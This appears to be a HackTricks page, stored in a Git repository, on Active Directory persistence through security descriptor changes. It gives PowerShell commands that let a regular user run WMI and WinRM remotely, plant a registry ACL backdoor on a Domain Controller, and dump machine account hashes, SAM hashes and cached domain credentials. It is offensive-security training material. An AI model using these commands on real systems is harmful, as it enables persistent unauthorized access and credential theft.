hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md
2024-12-12 11:39:29 +01:00

5.1 KiB
Raw Blame History

Security Descriptors

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Security Descriptors

From the docs: Security Descriptor Definition Language (SDDL) defines the format which is used to describe a security descriptor. SDDL uses ACE strings for DACL and SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

The security descriptors are used to store the permissions an object has over an object. If you can just make a little change in the security descriptor of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.

Then, this persistence technique is based on the ability to win every privilege needed against certain objects, to be able to perform a task that usually requires admin privileges but without the need of being admin.

Access to WMI

You can give a user access to execute remotely WMI using this:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

Access to WinRM

Give access to winrm PS console to a user using this:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Remote access to hashes

Access the registry and dump hashes creating a Reg backdoor using DAMP, so you can at any moment retrieve the hash of the computer, the SAM and any cached AD credential in the computer. So, it's very useful to give this permission to a regular user against a Domain Controller computer:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Check Silver Tickets to learn how you could use the hash of the computer account of a Domain Controller.

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}